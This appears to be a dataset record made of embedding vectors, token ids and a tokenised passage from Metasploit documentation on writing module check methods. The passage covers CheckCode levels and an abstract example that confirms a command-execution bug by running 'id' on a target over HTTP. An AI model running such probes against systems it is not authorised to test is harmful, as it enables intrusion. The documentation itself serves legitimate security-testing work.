-0.05881426855921745, 0.3156680166721344, 1.2126429080963135, -0.23345725238323212, -0.586473286151886, -0.02264920249581337, 0.1719486117362976, 0.30646151304244995, 0.37986695766448975, 1.1442954540252686, 0.20009516179561615, -0.08925903588533401, 0.04737474396824837, 0.1965549737215042, -0.4529809355735779, 0.26494765281677246, -0.3469736576080322, 0.1701672226190567, 0.2180785983800888, 0.10691169649362564, -0.6910141110420227, 0.6935321092605591, 0.5716061592102051, -0.7351596355438232, 0.07321860641241074, -0.800035834312439, 0.529762327671051, -1.0481036901474, 0.06638307869434357, 0.031273916363716125, -0.13604876399040222, -0.14648930728435516, -0.5253413915634155, -0.4935358464717865, -0.3365483582019806, -0.5916848182678223, 0.056559160351753235, -0.4347918629646301, 0.6480638384819031, -0.1316068172454834, -1.1550148725509644, 0.4255843460559845, -0.9481412768363953, -0.2156960666179657, -0.3931180536746979, -0.34526941180229187, 1.2586983442306519, 0.26063403487205505, 0.3462955057621002, 0.035449907183647156, -0.19309331476688385, -0.17863769829273224, 0.08065913617610931, 0.18455955386161804, -0.8689415454864502, 0.7655443549156189, 0.07990936934947968, -0.04987926781177521, 0.3573707938194275, 0.2955309748649597, -0.258714497089386, -0.9243410229682922, 0.3174799978733063, -0.5049747228622437, 0.4236528277397156, 0.004669787362217903, 0.5147752165794373, 0.03142291307449341, 1.3513695001602173, -0.5812150835990906, -0.22855667769908905, 0.8646628260612488, 0.008639035746455193, 0.4944615662097931, 0.36389610171318054, -0.12374286353588104, 0.056723903864622116, -0.6531674265861511, -0.5283849835395813, 0.31937679648399353, 0.0147229740396142, 0.35171735286712646, 0.4532739818096161, 0.48684781789779663, -0.27596789598464966, -0.4028836488723755, 0.19161619246006012, -0.5725890398025513, -0.45235708355903625, 0.49537941813468933, 0.2175551801919937, 1.2837245464324951, -0.4334300458431244, -0.04723970592021942, -0.32107746601104736, 0.043443016707897186, 0.2594151496887207, 0.1435539424419403, -0.21624250710010529, -0.8018942475318909, -0.3245030641555786, -0.38821837306022644, 0.05835298076272011, -0.03504831716418266, -0.045298390090465546, 0.4434608519077301, -0.8676692247390747, -0.6801457405090332, -0.8537650108337402, 0.8056005835533142, 0.8713536858558655, 0.7613553404808044, 0.9010946154594421, -0.31022748351097107, 0.16153915226459503, 0.019119445234537125, 0.5027777552604675, -0.20607678592205048, 0.5250595808029175, -0.4230008125305176, 0.46311700344085693, -0.08488301187753677, 0.589039146900177, -0.20990705490112305, 0.15984268486499786, 0.1621732860803604, 0.1404830366373062, -0.012788299471139908, -0.3742741644382477, -0.32708385586738586, 0.2618675231933594, 0.18402676284313202, 0.06270886957645416, -0.8580489754676819, -0.5406669974327087, -0.13440491259098053, 0.44499731063842773, 0.6033149361610413, -0.8505361080169678, 0.006724591366946697, -0.6068562269210815, -0.14091309905052185, 0.6005055904388428, 0.027424657717347145, -0.9230968356132507, -0.4123328626155853, -0.5786589980125427, -0.8548226952552795, -0.5573945641517639, 0.5943976640701294, -0.00047837317106314003, 0.5659757852554321, -0.591057538986206, 0.4831521213054657, 0.45434698462486267, -0.4533061385154724, -0.11811148375272751, -0.21595364809036255, 0.4795435070991516, -0.08239752799272537, 0.3611942529678345, -0.46811291575431824, -0.8392598032951355, 0.2709901034832001, -1.1758962869644165, 0.1241592988371849, -1.139089822769165, 0.40908244252204895, 0.18401435017585754, 0.5974449515342712, 0.05190353840589523, 0.07254160940647125, -0.9023227095603943, 0.1595926284790039, -0.1126612201333046, -0.014132540673017502, -0.6760169863700867, -0.18043214082717896, 0.1019073948264122, 0.10710834711790085, -0.6238512396812439, 0.784201979637146, 0.2831566035747528, 0.1563609391450882, 0.1470426768064499, -0.6295439004898071, -0.39285361766815186, 0.28643864393234253, -0.6518300771713257, 0.7205153703689575, 0.6585806608200073, 0.3166947662830353, -0.22149346768856049, -0.8932877779006958, 0.8309890031814575, 0.6116082668304443, 0.024459147825837135, -0.7245680689811707, -0.5746989846229553, 0.06540253013372421, 0.1153002679347992, 0.048258986324071884, 0.4125998020172119, -0.4220660328865051, -0.43878504633903503, -0.7367377877235413, -0.20355558395385742, -0.5712621808052063, 0.04096471145749092, -0.29512259364128113, -0.5795177221298218, 0.1988072246313095, 0.29441702365875244, 0.4904858469963074, -0.06802616268396378, -0.5251199007034302, -0.14186260104179382, -0.03886440396308899, 0.2404380440711975, -0.7450847625732422, 0.27840614318847656, -0.381407231092453, 0.3091650903224945, -0.47244998812675476, 0.6069149374961853, -0.9027132987976074, -0.21480542421340942, 0.49880531430244446, -0.024398693814873695, 0.46508368849754333, -0.33707666397094727, -1.1689461469650269, 0.7761209607124329, -0.16034354269504547, -0.6598021984100342, -0.3028484284877777, -0.002487063640728593, -0.04791365936398506, 0.49111607670783997, -0.29282131791114807, -0.4379945993423462, -1.143418312072754, -0.7178539633750916, 0.10887695103883743, -0.302995890378952, -0.35118669271469116, -0.9459191560745239, 0.06514541059732437, -0.5026191473007202, 0.38985323905944824, 0.5831900238990784, -0.5511960387229919, 0.01924007572233677, -0.012977836653590202, 0.5196126103401184, -0.3374791443347931, -0.40032538771629333, 0.382121205329895, -0.2290773093700409, -0.17347314953804016, 0.22391387820243835, -0.061622414737939835, -0.24814879894256592, -0.49371063709259033, 0.2815132737159729, 0.3777707815170288, -0.08232270926237106, -0.5452751517295837, -0.4941193759441376, -0.9540281891822815, 0.11984141170978546, -0.4237162470817566, 0.494533509016037, -0.4237751066684723, 0.2880927324295044, 0.18835295736789703, 0.8859298229217529, -0.23397037386894226, 0.23611509799957275, 0.34306904673576355, 0.840536892414093, 0.6430063247680664, -0.5331780314445496, 0.5053649544715881, -0.8244707584381104, 0.32846373319625854, 0.1719237118959427, 0.11855026334524155, -0.4918079078197479, -0.2968229651451111, -0.5477004051208496, -1.155286192893982, 0.25575876235961914, 0.01096037682145834, -0.29599159955978394, -0.3456208407878876, -0.37223005294799805, 0.5502693057060242, -0.5082707405090332, -0.029488714411854744, 1.0409064292907715, 0.44748854637145996, 0.37349840998649597, -0.3479691445827484, 0.7984879016876221, 0.6440871357917786, -0.14428898692131042, 0.4785156846046448, -0.11406505852937698, 0.24154803156852722, -0.09047920256853104, -0.31274276971817017, -0.4785635769367218, -0.6951602101325989, -0.503279447555542, 0.9161018133163452, 0.3879908323287964, 0.8054488301277161, 0.0343768335878849, -0.7320902347564697, -0.4327039122581482, 0.2530825734138489, -0.1832306683063507, 0.12577231228351593, 0.2600800395011902, 0.7294356822967529, 0.46755942702293396, -0.3149716258049011, -0.4131849706172943, -0.07410179823637009, -0.06592757999897003, 0.7313159704208374, 0.12544451653957367, -0.7728231549263, 0.22580310702323914, 0.17615024745464325, -0.7608262300491333, -0.5822707414627075, -0.6372395157814026, -0.23655575513839722, 0.5266550183296204, -0.5842559337615967, -0.1948152482509613, 0.06485689431428909, 0.14980433881282806, 0.38076919317245483, 0.6922768950462341, -0.29726967215538025, 0.2946208715438843, -0.8529502749443054, 0.4195312261581421, 0.46286845207214355, -0.04883919656276703, 0.8261072039604187, -0.5091221928596497, -0.13411538302898407, -0.5233877301216125, 0.2863703966140747, 0.014878167770802975, -0.08071410655975342, 0.9179016351699829, 0.07535891979932785, 0.006669742986559868, 0.12142731249332428, 0.07038010656833649, 0.5132843255996704, -0.15000119805335999, 0.2816063165664673, 0.8646053075790405, -0.09793458133935928, -0.9362848997116089, -0.14229921996593475, -0.11827750504016876, 0.05691750720143318, 0.06318937987089157, -0.2588825225830078, -0.19956782460212708, 0.1136012002825737, 0.18565592169761658, 0.10733591765165329, -0.6081506609916687, -0.016680389642715454, -0.9580181837081909, 0.041264649480581284, 0.24832606315612793, 0.07556251436471939, -0.1546400487422943, -0.003121080109849572, -0.07102077454328537, -0.8915910720825195, 0.03334854170680046, 0.852313220500946, -0.34906089305877686, 0.2732308506965637, -0.8623058795928955, 0.7862319350242615, -0.4747656583786011, -0.8553589582443237, -0.556731641292572, 0.10990305244922638, -0.3253908157348633, -0.3978230655193329, -0.03479981794953346, -0.10184671729803085, -0.5197136998176575, 0.11169374734163284, -0.012501516379415989, -0.14427949488162994, -0.2227439135313034, -0.35609427094459534, 0.8769574165344238, -0.04382101073861122, -0.769012987613678, 0.3115096986293793, -0.6337641477584839, 0.019234133884310722, 0.3746100962162018, -0.9504063725471497, 0.45059266686439514, -0.354073166847229, -0.2777995467185974, 0.36844706535339355, 0.014350024983286858, -0.26608869433403015, 0.7807848453521729, -0.005917370319366455, -1.2133469581604004, -0.2551952600479126, -0.4829006493091583, -0.23162929713726044, -0.17895947396755219, -0.32353445887565613, 0.46138569712638855, 0.486789345741272, 0.07879228889942169, 0.3719128966331482, -0.06816021353006363, 0.5349245667457581, 0.35106128454208374, 0.41308844089508057, 0.29991012811660767, 0.38366326689720154, -0.10599134117364883, 0.5887972712516785, 0.15274806320667267, 0.04816320165991783, -0.49541735649108887, 0.6714423298835754, -0.43011409044265747, 0.10043009370565414, 0.10940387845039368, 0.35842856764793396, -0.3355802297592163, 0.6632103323936462, 0.3162602484226227, -0.10832968354225159, 0.27444586157798767, 0.2766745090484619, -0.2804264426231384, 0.537739098072052, -1.3687388896942139, 0.06796074658632278, 0.1576659381389618, -0.34953543543815613, -0.3795512318611145, -0.8568404912948608, 0.16508376598358154, 0.3198212683200836, 0.12154754251241684, -0.05117921903729439, 0.30104225873947144, -0.011803975328803062, 0.20763321220874786, 0.918251633644104, -0.04269137978553772, -0.011344894766807556, -0.44019120931625366, 0.5478489398956299, -0.013315384276211262, -0.7936661243438721, 0.4582039415836334, 0.7333691120147705, 0.5201950073242188, -0.27878424525260925, -0.32869693636894226, 0.3330971300601959, 0.008222983218729496, 0.09361580014228821, -0.6900498867034912, 0.2161198854446411, -1.2440078258514404, 0.9593627452850342, -0.70441073179245, 0.49522602558135986, 0.05056563764810562, -0.04679449275135994, 0.09603417664766312, 0.2038867175579071, 0.02206284925341606, 0.809114396572113, -0.18917550146579742, 0.07103685289621353, 0.8604711294174194, 0.48737138509750366, 0.9478751420974731, -0.7394219040870667, -0.0302127618342638, 0.4680739641189575, 0.5376436114311218, 0.05151570960879326, 0.09895630180835724, -0.45588794350624084, 0.29592013359069824, 0.47787073254585266, -0.8961347937583923, -0.15758755803108215, 0.6884193420410156, -0.34366124868392944, -0.6622726321220398, 0.15017591416835785, 0.32916784286499023, 0.02478392794728279, 0.23222976922988892, -0.005511521827429533, 0.8337786197662354, -0.6077002882957458, 0.7767950296401978, -0.2591371238231659, -0.4010624289512634, 0.9246225953102112, -0.31268250942230225, 0.3414427936077118, 0.25813382863998413, -0.198707714676857, 0.7240800261497498, -0.06063196808099747, -0.6056772470474243, 0.381492018699646, 0.48732423782348633, 0.4645896255970001, -0.3141196072101593, 0.6510547995567322, -0.22640663385391235, -0.09775248169898987, -0.40633872151374817, 0.11974165588617325, -0.4801155626773834, -0.09161945432424545, 0.24858790636062622, -0.20805206894874573, -0.29934224486351013, 0.17956218123435974, 0.4211505651473999, -0.06343301385641098, 0.08268449455499649, -0.22715266048908234, 0.5946149230003357, -0.1606086939573288, 0.2766205668449402, -0.12724916636943817, 0.015262512490153313, 0.47034478187561035, 0.3815287947654724, -0.8932669162750244, 0.6539984345436096, -0.10958554595708847, 0.36122527718544006, 0.14153526723384857, 0.4651208519935608, -0.2617442309856415, 0.484285831451416, 0.19139187037944794, -0.8171364068984985, -0.3819273114204407, -0.10957420617341995, -0.4656270146369934, -0.40992262959480286, 0.05373038724064827, -0.2683620750904083, 0.31633150577545166, 0.06318221241235733, -0.38600772619247437, -0.3818182051181793, 0.13288091123104095, -0.1538596898317337, -0.1164681687951088, 0.5031408071517944, 0.2738443911075592, -1.2149633169174194, 0.31246381998062134, 0.16255925595760345, 0.1383102983236313, 0.1842772215604782, -0.2285332828760147, -0.6147032976150513, -0.4970945715904236, -0.21367724239826202, -0.6272078156471252, 0.7222578525543213, -0.5937734246253967, -0.7297086715698242, -0.21276450157165527, -0.8054017424583435, -0.3809540569782257, 0.1413688212633133, -1.0707242488861084, -0.36625349521636963, 0.6539053916931152, 0.18979468941688538, 0.14544105529785156, 0.32623031735420227, -0.6999304890632629, -0.10155186802148819, 0.37016674876213074, 0.5991907119750977, -0.11784961074590683, 1.4466300010681152, 0.6081023216247559, -0.254067987203598, 0.7406885623931885, -0.23096361756324768, 0.7921776175498962, -0.11642399430274963, -0.2456381916999817, -0.2563324570655823, -0.2633011043071747, -0.8513010740280151, -0.39565253257751465, -0.0821227878332138, 0.2576458752155304, -0.2763054370880127, -0.40719273686408997, -0.5995692610740662, -0.510080099105835, -0.7399777173995972, -0.5624414682388306, -0.07021348178386688, 0.21306294202804565, 0.05792980641126633, -0.060470063239336014, 0.8934630155563354, -0.9586514234542847, 4.272549629211426, 0.592759370803833, 0.09994035959243774, -0.13981768488883972, 0.38366514444351196, 0.6753880977630615, 0.7341716885566711, 0.11121319979429245, -0.1521855592727661, -0.5257630944252014, 0.331648051738739, -0.6010519862174988, 0.13181237876415253, 0.40905019640922546, 0.35327383875846863, 0.3068290948867798, -0.6947414875030518, 0.3139007091522217, 0.021579494699835777, -0.38176077604293823, -1.2798124551773071, 0.19432835280895233, -0.3798961341381073, 1.2633780241012573, 0.29584604501724243, 0.3382986783981323, -0.18623794615268707, -0.8453966975212097, 0.5660751461982727, -0.3947444558143616, 0.9096449613571167, -0.3714236319065094, 0.4142683744430542, -0.03599139302968979, -0.2211187779903412, -0.020130271092057228, -0.16082538664340973, -0.0011691011022776365, -0.8740381598472595, -0.4268660247325897, 0.5903798341751099, -0.03902825340628624, 0.24647007882595062, -0.39147913455963135, 0.4695676267147064, 0.23755009472370148, -0.5151247382164001, 1.087566614151001, 0.13684874773025513, -0.5067645311355591, 0.2937575578689575, -0.09824177622795105, 0.4397890269756317, 0.04748336225748062, -0.7127995491027832, -0.11971539258956909, 0.5738288164138794, -0.33947622776031494, 0.0071855951100587845, 0.10326225310564041, 0.09318125993013382, -0.34385472536087036, -0.6378926634788513, 0.35972344875335693, -0.2860517203807831, 0.432218462228775, -0.5629541873931885, 0.009346180595457554, -0.024319251999258995, 0.00478720897808671, -0.10854001343250275, 0.09123068302869797, 0.15679533779621124, -1.2736797332763672, 0.03463369607925415, 0.17552074790000916, -0.16202031075954437, 0.30578118562698364, 0.9123988151550293, -0.6445172429084778, -0.17799712717533112, -0.12503981590270996, -0.48692357540130615, 0.1872343271970749, 0.5218556523323059, 0.5148407220840454, -0.19387774169445038, -0.4210977554321289, 0.09667894244194031, 0.3156319260597229, 0.79328453540802, 0.7572690844535828, 0.06807108223438263, 0.2419852465391159, 0.0402490608394146 ]
[ 101, 1999, 18804, 13102, 4135, 4183, 1010, 20397, 1998, 9830, 14184, 2490, 1996, 4638, 3094, 2008, 4473, 1996, 5310, 2000, 2022, 2583, 2000, 5646, 1996, 8211, 2110, 2077, 2478, 1996, 11336, 1012, 2023, 3444, 2003, 18801, 2005, 2216, 2040, 2342, 2000, 20410, 1996, 18130, 2302, 2941, 20095, 1037, 5806, 1010, 1998, 2109, 2000, 2855, 6709, 2035, 8211, 1010, 2030, 4298, 18077, 3085, 6681, 2006, 1996, 2897, 1012, 2348, 18130, 14148, 4995, 1521, 1056, 1996, 3579, 1997, 18804, 13102, 4135, 4183, 1010, 2138, 2009, 3475, 1521, 1056, 1037, 18130, 26221, 2066, 11265, 2595, 20688, 1010, 2057, 2079, 2941, 8627, 2111, 2000, 10408, 1996, 4638, 1006, 1007, 4118, 4312, 2000, 5587, 2062, 3643, 2000, 1996, 11336, 1012, 2065, 2017, 2079, 4339, 2028, 1010, 2191, 2469, 2000, 2562, 2122, 11594, 1999, 2568, 1024, 4638, 4118, 6434, 5302, 8566, 4244, 7696, 2024, 2590, 2000, 1996, 5310, 1010, 2138, 2027, 2562, 1996, 5310, 6727, 2055, 2054, 1996, 11336, 2003, 2725, 1010, 1998, 2788, 2191, 1996, 11336, 2062, 2139, 8569, 23033, 3468, 1012, 2174, 1010, 2017, 2079, 2036, 2215, 2000, 2562, 2115, 7696, 1999, 12034, 9232, 5549, 2138, 2009, 4150, 2428, 20810, 2065, 1996, 4638, 2003, 2109, 2114, 3674, 7889, 1012, 28946, 1010, 2017, 2069, 2323, 2022, 2478, 2122, 6140, 4725, 1024, 4118, 6155, 23235, 3258, 2615, 16550, 1035, 2240, 1006, 1007, 12034, 9232, 2544, 1997, 6140, 1035, 2240, 2615, 16550, 1035, 3570, 1006, 1007, 12034, 9232, 2544, 1997, 6140, 1035, 3570, 2008, 4269, 2007, 1523, 1031, 1008, 1033, 1524, 21210, 6657, 2102, 1035, 7561, 1006, 1007, 12034, 9232, 2544, 1997, 6140, 1035, 7561, 2008, 4269, 2007, 1523, 1031, 1060, 1033, 1524, 21210, 6657, 2102, 1035, 5432, 1006, 1007, 12034, 9232, 2544, 1997, 6140, 1035, 5432, 2008, 4269, 2007, 1523, 1031, 999, 1033, 1524, 1010, 1999, 3756, 20915, 3334, 2664, 1010, 2224, 1996, 4638, 16044, 6412, 2000, 3073, 3176, 2592, 1006, 2156, 2917, 1007, 1012, 3602, 1024, 2017, 5807, 1521, 1056, 2022, 8021, 2065, 1037, 4539, 2003, 8211, 2030, 2025, 1010, 2004, 2023, 2003, 8073, 8971, 2011, 1996, 7705, 2043, 2115, 4118, 5651, 1037, 4638, 3642, 1012, 4638, 9537, 2239, 3401, 2017, 2031, 4340, 1996, 8211, 2110, 1010, 2017, 2323, 2709, 1037, 4638, 3642, 1012, 4638, 9537, 2024, 5377, 2015, 4225, 1999, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4638, 16044, 1010, 1998, 2122, 2024, 1996, 3924, 2017, 2064, 2224, 1024, 4638, 16044, 6155, 23235, 3258, 10288, 24759, 28100, 1024, 1024, 4638, 16044, 1024, 1024, 4242, 13901, 2065, 1996, 11336, 11896, 2000, 12850, 2438, 2592, 2013, 1996, 4539, 3698, 1010, 2107, 2004, 2349, 2000, 1037, 2051, 5833, 1012, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 3647, 13901, 2065, 1996, 4638, 11896, 2000, 9495, 1996, 18130, 1010, 2030, 2130, 11487, 1996, 2326, 1012, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 11156, 10760, 4539, 2003, 2770, 1996, 2326, 1999, 3160, 1010, 2021, 1996, 4638, 11896, 2000, 5646, 3251, 1996, 4539, 2003, 8211, 2030, 2025, 1012, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 3544, 15222, 2015, 2003, 2109, 2065, 1996, 18130, 2003, 4340, 2241, 2006, 13135, 8967, 1012, 2005, 2742, 1024, 2544, 1010, 9484, 9775, 1010, 2030, 3432, 2383, 1996, 7692 ]
metasploit
108.txt
0
that ’ s known to be vulnerable. exploit : : checkcode : : vulnerableonly used if the check is able to actually take advantage of the bug, and obtain some sort of hard evidence. for example : for a command execution type bug, get a command output from the target system. for a directory traversal, read a file from the target, etc. since this level of check is pretty aggressive in nature, you should not try to dos the host as a way to prove the vulnerability. exploit : : checkcode : : unsupportedthe exploit does not support the check method. if this is the case, then you don ’ t really have to add the check method. the checkcode also supports an optional description which is printed by the framework upon completion of the check method. for example : return checkcode : : appears ('vulnerable component xyz is installed') metasploitmodule # check methods should capture any known raise from methods called and return value of class msf : : exploit : : checkcode. basically, that means avoiding the use of fail _ with or raising exceptions that are not handled within the check method. remote check examplehere ’ s an abstract example of how a metasploit check might be written : # # returns a check code that indicates the vulnerable state on an app running on os x # def check if exec _ cmd _ via _ http ( " id " ) = ~ / uid = \ d + \ (. + \ ) / # found the correct id output, good indicating our command executed return exploit : : checkcode : : vulnerable end url = get _ url if url if url = ~ / something cms v1 \. 0 / # we are able to find the version therefore more precise about the vuln state return exploit : : checkcode : : appears elsif url = ~ / something cms / # all we can tell the vulnerable app is running, but no more info to # determine the vuln return exploit : : checkcode : : detected end else vprint _ error ( " unable to determine due to a http connection timeout " ) return exploit : : checkcode : : unknown end exploit : : checkcode : : safe end note : if you are writing an auxiliary module with the msf : : auxiliary : : scanner mixin, you should declare your check method like this : def check _ host ( ip ) # do your thing end local exploit check example
[ 0.39638787508010864, -0.3993414342403412, -0.13785414397716522, 0.5732360482215881, -0.08414117246866226, -0.11232221871614456, -0.5436572432518005, 0.14411482214927673, 0.37418338656425476, 0.8638159036636353, 0.3686898946762085, 0.038348402827978134, 0.413986474275589, -0.3965179920196533, -0.47083374857902527, -0.533211886882782, -0.5820744633674622, -0.029202070087194443, -0.9117656350135803, 0.003166826209053397, 0.4313904345035553, -0.34342071413993835, -0.9956392645835876, -0.256614625453949, -0.8908059000968933, 0.6795060634613037, 0.6905180215835571, -0.39767715334892273, 0.32776445150375366, 0.5301083326339722, 0.42957115173339844, -0.6679198145866394, -0.06395029276609421, -0.7075917720794678, 0.34571418166160583, -0.15174129605293274, 0.5404406785964966, -0.5456424951553345, -0.10440046340227127, -0.8868523240089417, 0.40191447734832764, -0.2834618091583252, 0.16639171540737152, -0.16513077914714813, -0.5249779224395752, -0.17244578897953033, 0.2031046599149704, -0.2778812646865845, 0.6164112687110901, -0.43369337916374207, 0.3032374382019043, 0.39570751786231995, 0.24181000888347626, 0.22700709104537964, 0.34352174401283264, -0.13984039425849915, 0.0837009996175766, 0.5105860233306885, -0.2589208781719208, -0.01702716015279293, 0.23698394000530243, 0.5078421235084534, 0.14406028389930725, -0.5971754193305969, -0.2995981276035309, 0.6691792011260986, -0.16820093989372253, -0.285224586725235, 0.09979958832263947, -0.35108697414398193, -0.1969829499721527, 0.2998448610305786, -0.6146488189697266, -0.3984949588775635, -0.9849965572357178, 0.19964665174484253, 0.12141125649213791, -0.6893103122711182, -0.2782725393772125, 0.4790536165237427, -0.042245469987392426, 0.7539471983909607, 0.3175421357154846, -0.28556543588638306, 0.12558814883232117, -0.07857304811477661, 0.2937943935394287, 1.1699779033660889, -0.4251914322376251, 0.275738388299942, 0.8196342587471008, 0.8765199780464172, -0.2290542721748352, -0.2718273103237152, 0.4607318043708801, 0.6514096260070801, -0.5089428424835205, 0.1608903557062149, 0.3383985459804535, -0.05628291144967079, 0.18291456997394562, 0.609398365020752, 0.25444909930229187, 0.43703335523605347, 0.055253852158784866, 0.4606121778488159, 0.16425840556621552, -0.15139684081077576, 0.11759820580482483, -0.03284093737602234, 0.45039984583854675, 0.1204301193356514, -0.22760488092899323, -0.6006584167480469, -0.19650053977966309, 0.2802077829837799, 0.23679082095623016, -0.22572186589241028, -0.4742163419723511, 0.497912734746933, 0.131896510720253, -0.4772830009460449, -0.15966914594173431, 0.2535654902458191, 0.3129567503929138, -0.17039985954761505, 0.31187593936920166, 0.40659090876579285, -0.2897047698497772, -0.21093401312828064, -0.06161816790699959, -0.16934119164943695, 0.33267509937286377, 0.8840353488922119, -0.3483751714229584, 0.17364200949668884, 0.07124131917953491, 0.011218766681849957, 0.3611198663711548, -0.8753331899642944, 0.008671104907989502, 0.37297478318214417, 0.1662415862083435, 1.034359097480774, 0.6545906662940979, -0.10838375985622406, -0.3175070881843567, -0.09179999679327011, -0.4601900577545166, 0.7462949752807617, -0.6070145964622498, -0.3225080370903015, 0.6291526556015015, -0.6192575693130493, -0.7276322841644287, 0.08353868871927261, -0.7312184572219849, 0.717822790145874, -0.464794397354126, -0.215720534324646, 0.25610047578811646, 1.1070834398269653, 0.3368169367313385, 0.28719788789749146, -0.6181861162185669, 0.1919170767068863, -0.6013781428337097, -0.797964334487915, -0.24462832510471344, 0.18230606615543365, 0.2493673712015152, 0.14159536361694336, -0.09099145978689194, 0.09381816536188126, 1.523866891860962, 0.9238916039466858, -0.46532154083251953, -0.4536944031715393, 0.3035782277584076, 0.34441155195236206, -0.9690030217170715, 0.46749991178512573, 0.0007229986367747188, 0.6854345798492432, 0.04810285568237305, 0.22826163470745087, 0.030692797154188156, -1.1183135509490967, 0.20867006480693817, -0.29382073879241943, -0.045628275722265244, 0.45763126015663147, -0.3528537452220917, 0.5494127869606018, 0.8007300496101379, -0.33244743943214417, -1.0147219896316528, -0.36639928817749023, 0.054231755435466766, -1.262692928314209, -0.31028926372528076, -0.18016646802425385, -0.24457941949367523, 0.5336124300956726, -0.7660208940505981, -0.2459966391324997, 0.8048683404922485, 0.3684089183807373, -0.3998643159866333, 0.5484735369682312, 0.7966172099113464, -0.6172800660133362, -0.10569936782121658, -0.028044752776622772, -0.13190878927707672, 0.4272216260433197, -0.6932229399681091, 0.5190962553024292, -0.17093311250209808, 0.42226070165634155, 0.2738492786884308, 0.5020740628242493, 0.576555073261261, 0.15012714266777039, 0.02906341850757599, -0.0908958688378334, -0.4039548933506012, 0.40833407640457153, -0.6874060034751892, -0.2723364531993866, -0.07017796486616135, 0.392871618270874, 0.27209576964378357, 0.8653359413146973, -0.18620628118515015, -0.13999779522418976, 0.06113512068986893, 0.15243615210056305, 0.15784360468387604, -0.49230316281318665, 0.2965624928474426, 0.6942432522773743, 0.11476056277751923, 0.4300804138183594, 0.30683642625808716, 0.24833795428276062, 0.19512523710727692, -0.020988253876566887, 0.3801077902317047, 0.7601935863494873, 0.013358346186578274, 0.7001639008522034, -0.05407857149839401, -0.12413793802261353, -0.5948378443717957, -0.9071635007858276, 0.645527184009552, 0.593654990196228, -0.8930449485778809, -0.6267544031143188, 0.013253645971417427, -0.13364136219024658, -0.7113891839981079, -0.6601792573928833, 0.2791464328765869, 0.31281429529190063, -0.4339735209941864, 0.1810324490070343, 0.03271980956196785, -0.5870360732078552, -0.4495790898799896, -0.04630248248577118, -1.0269378423690796, -0.4620307981967926, -0.5070356726646423, 0.374438613653183, 0.08777885138988495, -0.24912694096565247, 0.11907213926315308, -0.5582413077354431, -0.7581779956817627, -0.029296332970261574, 0.20698297023773193, 0.697904646396637, 0.12233888357877731, -0.29236242175102234, -0.7601290345191956, 0.2506098747253418, -0.013141561299562454, 1.1059819459915161, -0.09223997592926025, -0.3235243558883667, -0.08794041723012924, -0.27266988158226013, 0.040068306028842926, -0.024226509034633636, 1.107237458229065, 0.3571917414665222, 0.012292490340769291, -0.05718495324254036, 0.050766825675964355, -0.40212562680244446, 0.43227440118789673, 0.17032822966575623, 0.038464535027742386, 0.3472430109977722, -0.3389589488506317, -0.12841789424419403, 0.34130921959877014, 0.3059409558773041, -0.4847899079322815, 0.27132147550582886, -0.3607955574989319, 0.5350316762924194, -0.7113296389579773, 0.5843738317489624, -0.03056679293513298, 0.0600336417555809, -0.02359205298125744, -0.342727392911911, 0.014138524420559406, -0.2250363528728485, -0.17442063987255096, 0.11952679604291916, -0.5287395119667053, 0.3463202118873596, 0.13082385063171387, -1.0832939147949219, 0.5613869428634644, -0.4666013717651367, -0.04831574484705925, -0.4263683259487152, -0.10098964720964432, 1.0031098127365112, 0.086925208568573, 0.15965715050697327, -0.09586998075246811, -0.3993425965309143, -0.0477169007062912, 0.4243847131729126, -0.05757466331124306, -0.8667283058166504, 0.5113145112991333, 0.09368214756250381, -0.0870673805475235, 0.6671257019042969, 0.39040639996528625, -0.39969372749328613, -0.5196002125740051, 0.11051473766565323, -0.3133136034011841, 0.3966762125492096, -0.15885001420974731, 0.30329498648643494, 0.07172168046236038, 1.0000579357147217, -0.3276101052761078, -0.47654780745506287, -0.003715531900525093, 0.08455827087163925, 0.2929115891456604, 0.017418378964066505, -0.25321370363235474, 0.11498456448316574, -0.38525643944740295, -0.2827199399471283, 0.4733756482601166, -0.2677030861377716, 0.5029727220535278, 0.4641602635383606, 0.37511777877807617, -0.3578791916370392, -0.14637187123298645, 0.46640026569366455, -0.34283050894737244, -0.5690470337867737, 0.23951251804828644, -0.0014994891826063395, 0.3790225684642792, -0.25937941670417786, -0.19521456956863403, -0.30249759554862976, 0.052776120603084564, 0.26302486658096313, -0.07501371204853058, -0.15243233740329742, -0.5914541482925415, -0.47163963317871094, 0.13193969428539276, -0.21934232115745544, 0.1586337834596634, -0.19603218138217926, 0.35681843757629395, -0.4915008544921875, -0.6101984977722168, -0.838223397731781, 0.6483654975891113, 1.0251402854919434, 1.0008734464645386, 0.6876655220985413, 0.22173497080802917, -0.039426013827323914, -0.23809786140918732, 0.7619446516036987, -0.20774297416210175, 0.423448383808136, -0.5568785071372986, 0.4312001168727875, -0.0845840647816658, 0.447618305683136, -0.53444504737854, 0.1737978458404541, -0.011123508214950562, -0.29664531350135803, -0.09578817337751389, -0.4309837222099304, -0.23166850209236145, 0.18757364153862, -0.06434258073568344, -0.02982408180832863, -0.7158957719802856, -0.5176488161087036, -0.09903886169195175, 0.39081546664237976, 0.616657018661499, -1.0155248641967773, 0.042171575129032135, -0.8019947409629822, 0.04405556991696358, 0.6251738667488098, -0.031182363629341125, -0.5564952492713928, -0.8812525868415833, -0.6604666113853455, -0.9622660279273987, -0.1907223016023636, 0.5577502250671387, 0.0014033624902367592, -0.02568325214087963, -0.8676946759223938, 0.09799548983573914, 0.2621247172355652, -0.22339098155498505, -0.775589644908905, -0.4371050000190735, 0.2338782548904419, 0.20030440390110016, 0.4840565323829651, -0.9278445243835449, -0.6512359976768494, -0.028464682400226593, -0.7589804530143738, 0.5509110689163208, -0.9796930551528931, 0.4845028221607208, 0.49274933338165283, 0.07120893150568008, -0.049626123160123825, 0.22862793505191803, -0.5419577360153198, 0.11398224532604218, -0.7214469313621521, 0.4136491119861603, -0.5124521255493164, 0.14934268593788147, 0.2505788505077362, -0.18558253347873688, -0.09164247661828995, 0.27000635862350464, 0.11233488470315933, 0.12397881597280502, 0.44996508955955505, -0.25314176082611084, -0.22162048518657684, 0.03879757225513458, -0.9518724083900452, 0.367910236120224, 0.7100070118904114, 0.7189478278160095, 0.20234039425849915, -0.4678414762020111, 1.3980787992477417, 0.6489578485488892, 0.5055103302001953, -0.9867204427719116, -0.3579528331756592, 0.17865218222141266, 0.27455082535743713, 0.5724316835403442, 0.5434894561767578, 0.07285372167825699, -0.09100769460201263, 